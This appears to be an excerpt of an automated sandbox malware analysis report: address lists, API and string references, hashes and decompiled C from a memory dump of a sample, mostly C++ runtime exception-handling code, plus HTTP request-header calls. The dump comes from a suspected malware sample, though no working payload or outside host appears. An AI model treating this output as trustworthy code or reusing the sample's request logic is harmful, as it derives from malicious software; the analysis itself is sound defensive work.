0x00401742
0x00401742
0x00401744
0x00401749
0x00000000
0x0040172e
0x0040172e
0x00401731
0x00401739
0x0040173c
0x004018f6
0x004018f6
0x004018fb
0x004018fc
0x004018fd
0x004018fe
0x004018ff
0x00401900
0x00401901
0x00401903
0x00401905
0x00401910
0x00401911
0x00401919
0x00401919
0x0040191b
0x0040191e
0x0040191f
0x00401920
0x00401921
0x00401925
0x0040192b
0x0040192e
0x00401931
0x00401933
0x0040193a
0x0040193d
0x00401944
0x0040194b
0x0040194e
0x00401952
0x00401952
0x00401954
0x00401955
0x00401955
0x0040195b
0x00401960
0x00401965
0x0040196f
0x00401972
0x00401975
0x00401978
0x0040197a
0x0040198b
0x0040198d
0x00401990
0x00401993
0x004019d0
0x004019d0
0x004019d7
0x004019db
0x004019dd
0x004019f5
0x004019f5
0x004019f5
0x004019df
0x004019e8
0x004019ea
0x004019ed
0x004019ef
0x00000000
0x004019f1
0x004019f1
0x004019f1
0x004019ef
0x004019f8
0x004019fa
0x00401a03
0x00401a0a
0x00401a0d
0x00401a14
0x00401a1b
0x00401a1c
0x00401a24
0x00401a28
0x00401a2d
0x00401a34
0x00401a37
0x00401a39
0x00401a3c
0x00401a40
0x00401a44
0x00401a46
0x00401a50
0x00401a55
0x00401a5b
0x00401a73
0x00401a7b
0x00401a85
0x00401a94
0x00401a96
0x00401a99
0x00401a9b
0x00401aa6
0x00401ab1
0x00401ab7
0x00401ac0
0x00401ad2
0x00401ad8
0x00401ade
0x00401ae0
0x00401ae2
0x00401ae4
0x00401aed
0x00401b09
0x00401b0b
0x00401b0d
0x00401b10
0x00401b1e
0x00401b24
0x00401b26
0x00401b2b
0x00401b2c
0x00401b31
0x00401b31
0x00401b35
0x00401b35
0x00401b38
0x00401b3a
0x00401b3a
0x00401b3e
0x00401b3e
0x00401b40
0x00401b45
0x00401b48
0x00401b4b
0x00401b4e
0x00401b78
0x00401b78
0x00401b7b
0x00401b82
0x00401b89
0x00401b8d
0x00401b90
0x00401bba
0x00401bbf
0x00401bc7
0x00401bc8
0x00401bc9
0x00401bcd
0x00401bd7
0x00401b92
0x00401b92
0x00401b95
0x00401b96
0x00401b98
0x00401b9e
0x00401bb0
0x00401bb0
0x00401bb2
0x00000000
0x00401ba0
0x00401ba0
0x00401ba3
0x00401bab
0x00401bae
0x00000000
0x00000000
0x00000000
0x00000000
0x00401bae
0x00401b9e
0x00401b50
0x00401b50
0x00401b53
0x00401b54
0x00401b56
0x00401b5c
0x00401b6e
0x00401b6e
0x00401b70
0x00401b75
0x00000000
0x00401b5e
0x00401b5e
0x00401b61
0x00401b69
0x00401b6c
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b6c
0x00401b5c
0x00401995
0x00401995
0x00401997
0x00401bda
0x00401bdf
0x00401bdf
0x00401be4
0x00401be5
0x00401be6
0x00401be7
0x00401be8
0x00401be9
0x00401bea
0x00401beb
0x00401bec
0x00401bed
0x00401bee
0x00401bef
0x00401bf0
0x00401bf3
0x00401bf4
0x00401bf6
0x00401bf9
0x00401c00
0x00401c02
0x00401c05
0x00401c0d
0x00401c0d
0x00401c14
0x00401c19
0x00401c20
0x0040199d
0x004019a2
0x004019a9
0x004019ab
0x004019ae
0x004019b1
0x004019b5
0x004019b7
0x004019b9
0x004019be
0x004019c5
0x004019ca
0x004019cd
0x00000000
0x004019cd
0x00401997
0x00000000
0x00000000
0x00000000
0x0040173c
0x0040172c
0x00401715
0x004015a6
0x00401599
0x00000000
0x00000000
0x00000000
0x004013ef
0x004013df

APIs

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401357
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 0040137D

Part of subcall function 00402030: Concurrency::cancel_current_task.LIBCPMT ref: 00402163

HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004013A3
HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004013C9

Strings

GET, xrefs: 00401AFD
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004013A7
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 00401381
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401319
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 0040135B
text, xrefs: 004016FC

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
API String ID: 2146599340-3782612381
Opcode ID: 2453df2e1a3b0ac922ee4492c696e2bb7ef366fe9da92be8e26a6922f9394f14
Instruction ID: 0fbde31e8750a1effae5edf28c0758ce4de90ad80f9392a87f061ffe8b163dbd
Opcode Fuzzy Hash: 2453df2e1a3b0ac922ee4492c696e2bb7ef366fe9da92be8e26a6922f9394f14
Instruction Fuzzy Hash: BC316371D0010CABEB14DBA9CC91FEEBBB9EB48714F60802AE621761D1C779A544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00410902 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00410902(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E0041199D(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E00418419(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_t203 = E00410586(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E00410586(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E0040E478(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E0040E3AB(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00410882(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E00418419(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E00410586(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E00410586(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E00410586(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E00410586(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E0040E3AB(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E00410882(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0040E7E3(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E00410586(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E00411311(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E00410586(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E00410586(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00410586(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E00410586(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E00411311(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E0041AEDD(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E00410FA5( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x43bb08) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E0040E7E3(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E00410F8D( &_v64);
											E0040EC3B( &_v64, 0x43987c);
											L63:
											 *(E00410586(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E00410586(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E0040E59E(_t279, _t319, _t274);
											E00411211(_a8, _a16, _t305);
											_t235 = E004113CE(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E00411188(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x00410902
0x00410909
0x0041090b
0x00410914
0x0041091a
0x00410922
0x00410924
0x00410927
0x0041092d
0x00410ca6
0x00410ca6
0x00410cab
0x00410cad
0x00410caf
0x00410cb2
0x00410cb3
0x00410cb6
0x00410cbc
0x00410ddb
0x00410cc2
0x00410cc4
0x00410ccb
0x00410cce
0x00410cd1
0x00410cd7
0x00410cd9
0x00410cde
0x00410ce1
0x00410ce3
0x00410ce9
0x00410ceb
0x00410cf1
0x00410d06
0x00410d0b
0x00410d0e
0x00410d10
0x00410dd7
0x00000000
0x00410dd8
0x00410d10
0x00410cf1
0x00410ce9
0x00410ce1
0x00410d16
0x00410d19
0x00410d1c
0x00410d1f
0x00410d22
0x00410d28
0x00410d3a
0x00410d3f
0x00410d42
0x00410d45
0x00410d48
0x00410d4b
0x00410d4e
0x00410d51
0x00000000
0x00000000
0x00410d57
0x00410d57
0x00410d5a
0x00410d5d
0x00410d6c
0x00410d6d
0x00410d6d
0x00410d6f
0x00410d72
0x00000000
0x00000000
0x00410d74
0x00410d77
0x00000000
0x00000000
0x00410d85
0x00410d87
0x00410d8a
0x00410d8c
0x00410d94
0x00410d94
0x00410d97
0x00410d99
0x00410d9b
0x00410db7
0x00410dbc
0x00410dbf
0x00410dbf
0x00000000
0x00410d97
0x00410d8e
0x00410d92
0x00000000
0x00000000
0x00000000
0x00410dc2
0x00410dc5
0x00410dc6
0x00410dc9
0x00410dcc
0x00410dcf
0x00410dd2
0x00410dd2
0x00000000
0x00410d5d
0x00410ddc
0x00410de1
0x00410de2
0x00410de5
0x00410de8
0x00410de9
0x00410dea
0x00410deb
0x00410dee
0x00410df0
0x00410e68
0x00410e6a
0x00410e6a
0x00410df2
0x00410df2
0x00410df5
0x00410df8
0x00000000
0x00410dfa
0x00410dfa
0x00410dfd
0x00410e00
0x00410e07
0x00410e07
0x00410e0a
0x00410e0c
0x00410e0e
0x00410e40
0x00410e40
0x00410e43
0x00410e4a
0x00410e4a
0x00410e4d
0x00410e50
0x00410e57
0x00410e57
0x00410e5a
0x00410e61
0x00410e63
0x00410e63
0x00410e5c
0x00410e5c
0x00410e5f
0x00000000
0x00000000
0x00410e5f
0x00410e52
0x00410e52
0x00410e55
0x00000000
0x00000000
0x00410e55
0x00410e45
0x00410e45
0x00410e48
0x00000000
0x00000000
0x00410e48
0x00410e64
0x00410e10
0x00410e10
0x00410e10
0x00410e13
0x00410e13
0x00410e15
0x00410e17
0x00000000
0x00000000
0x00410e19
0x00410e1b
0x00410e2f
0x00410e2f
0x00410e1d
0x00410e1d
0x00410e20
0x00410e23
0x00000000
0x00410e25
0x00410e25
0x00410e28
0x00410e2b
0x00410e2d
0x00000000
0x00000000
0x00000000
0x00000000
0x00410e2d
0x00410e23
0x00410e38
0x00410e38
0x00410e3a
0x00000000
0x00410e3c
0x00410e3c
0x00410e3c
0x00000000
0x00410e3a
0x00410e33
0x00410e35
0x00410e35
0x00000000
0x00410e35
0x00410e02
0x00410e02
0x00410e05
0x00000000
0x00000000
0x00000000
0x00000000
0x00410e05
0x00410e00
0x00410df8
0x00410e6b
0x00410e6f
0x00410e6f
0x0041093c
0x0041093c
0x00410945
0x00410a42
0x00410a42
0x00410a45
0x00000000
0x00410974
0x00410974
0x00410979
0x00000000
0x0041097f
0x0041097f
0x00410987
0x00410c40
0x00410c44
0x0041098d
0x00410992
0x00410995
0x0041099a
0x004109a1
0x004109a6
0x00000000
0x004109de
0x004109e6
0x00410a4a
0x00410a4a
0x00410a4d
0x00410a50
0x00410a52
0x00410a55
0x00410a58
0x00410a5e
0x00410c0f
0x00410c0f
0x00410c12
0x00000000
0x00410c14
0x00410c14
0x00410c17
0x00000000
0x00410c1d
0x00410c1d
0x00410c20
0x00410c23
0x00410c24
0x00410c25
0x00410c28
0x00410c29
0x00410c2c
0x00410c2d
0x00410c32
0x00000000
0x00410c32
0x00410c17
0x00410a64
0x00410a64
0x00410a68
0x00000000
0x00410a6e
0x00410a6e
0x00410a75
0x00410a8d
0x00410a8d
0x00410a90
0x00410a93
0x00410a99
0x00410aa9
0x00410aae
0x00410ab1
0x00410ab4
0x00410ab7
0x00410aba
0x00410abd
0x00410ac0
0x00410ac6
0x00410ac6
0x00410ac9
0x00410acc
0x00410adb
0x00410adc
0x00410adc
0x00410ade
0x00410ae1
0x00410ae7
0x00410aea
0x00410af0
0x00410af2
0x00410af5
0x00410af8
0x00410b01
0x00410b04
0x00410b06
0x00410b06
0x00410b09
0x00410b0c
0x00410b0f
0x00410b12
0x00410b15
0x00410b1a
0x00410b1b
0x00410b1c
0x00410b1d
0x00410b1e
0x00410b21
0x00410b23
0x00410b25
0x00000000
0x00410b27
0x00410b27
0x00410b27
0x00410b2a
0x00410b2d
0x00410b2f
0x00410b30
0x00410b35
0x00410b38
0x00410b3a
0x00000000
0x00000000
0x00410b3c
0x00410b3d
0x00410b40
0x00410b42
0x00000000
0x00410b44
0x00410b44
0x00410b47
0x00410b4a
0x00000000
0x00410b4a
0x00000000
0x00410b42
0x00410b5e
0x00410b64
0x00410b81
0x00410b86
0x00410b86
0x00410b89
0x00410b89
0x00000000
0x00410b4d
0x00410b4d
0x00410b4e
0x00410b51
0x00410b54
0x00410b57
0x00410b57
0x00000000
0x00410b5c
0x00410af8
0x00410aea
0x00410b8c
0x00410b8f
0x00410b90
0x00410b93
0x00410b96
0x00410b99
0x00410b9c
0x00410b9c
0x00410ba5
0x00410ba8
0x00410ba8
0x00410ac0
0x00410bab
0x00410baf
0x00410bb1
0x00410bb4
0x00410bba
0x00410bba
0x00410bc2
0x00410bc7
0x00410c35
0x00410c35
0x00410c3a
0x00410c3e
0x00000000
0x00000000
0x00000000
0x00000000
0x00410bc9
0x00410bc9
0x00410bcd
0x00410bdf
0x00410be2
0x00410be5
0x00410be7
0x00410bfe
0x00410c02
0x00410c08
0x00410c09
0x00410c0b
0x00000000
0x00410c0d
0x00000000
0x00410c0d
0x00410be9
0x00410bee
0x00410bf1
0x00410bf6
0x00410bf9
0x00000000
0x00410bf9
0x00410bcf
0x00410bd2
0x00410bd5
0x00410bd7
0x00000000
0x00410bd9
0x00410bd9
0x00410bdd
0x00000000
0x00000000
0x00000000
0x00000000
0x00410bdd
0x00410bd7
0x00410bcd
0x00410a77
0x00410a77
0x00410a7e
0x00000000
0x00410a80
0x00410a80
0x00410a87
0x00000000
0x00000000
0x00000000
0x00000000
0x00410a87
0x00410a7e
0x00410a75
0x00410a68
0x004109e8
0x004109f0
0x004109f3
0x004109f8
0x004109fc
0x004109ff
0x00410a05
0x00410a08
0x00000000
0x00410a0a
0x00410a0a
0x00410a0d
0x00410a0f
0x00410c45
0x00410c45
0x00000000
0x00410a15
0x00410a1d
0x00410a28
0x00000000
0x00000000
0x00410a31
0x00410a34
0x00410a35
0x00410a38
0x00410a3a
0x00000000
0x00410a40
0x00000000
0x00410a40
0x00000000
0x00410a3a
0x00410a15
0x00410c4a
0x00410c4a
0x00410c4c
0x00410c4d
0x00410c54
0x00410c57
0x00410c65
0x00410c6a
0x00410c6f
0x00410c72
0x00410c77
0x00410c7a
0x00410c7d
0x00410c7f
0x00410c81
0x00410c81
0x00410c86
0x00410c92
0x00410c98
0x00410c9d
0x00410ca0
0x00410ca1
0x00000000
0x00410ca1
0x00410a08
0x004109e6
0x004109a6
0x00410987
0x00410979
0x00410945

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 004109FF
type_info::operator==.LIBVCRUNTIME ref: 00410A21
___TypeMatch.LIBVCRUNTIME ref: 00410B30
IsInExceptionSpec.LIBVCRUNTIME ref: 00410C02
_UnwindNestedFrames.LIBCMT ref: 00410C86
CallUnexpected.LIBVCRUNTIME ref: 00410CA1

Strings

csm, xrefs: 0041093F
csm, xrefs: 00410A58
csm, xrefs: 004109AC

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: e9be4eaa81843e2760fefa6845e5e00ce76653fd21b0999f00d899327e9ecae3
Instruction ID: 6e0331d367ebf6dc0efbaca1bbd9b994829bb620a1ec533493efa11ef9fbe89a
Opcode Fuzzy Hash: e9be4eaa81843e2760fefa6845e5e00ce76653fd21b0999f00d899327e9ecae3
Instruction Fuzzy Hash: E2B17A71800209EFCF28DFA5C8819EEB7B5BF18314B14455BE8156B212E7B8DAD1CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00830B69 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00830C66
type_info::operator==.LIBVCRUNTIME ref: 00830C88
___TypeMatch.LIBVCRUNTIME ref: 00830D97
IsInExceptionSpec.LIBVCRUNTIME ref: 00830E69
_UnwindNestedFrames.LIBCMT ref: 00830EED
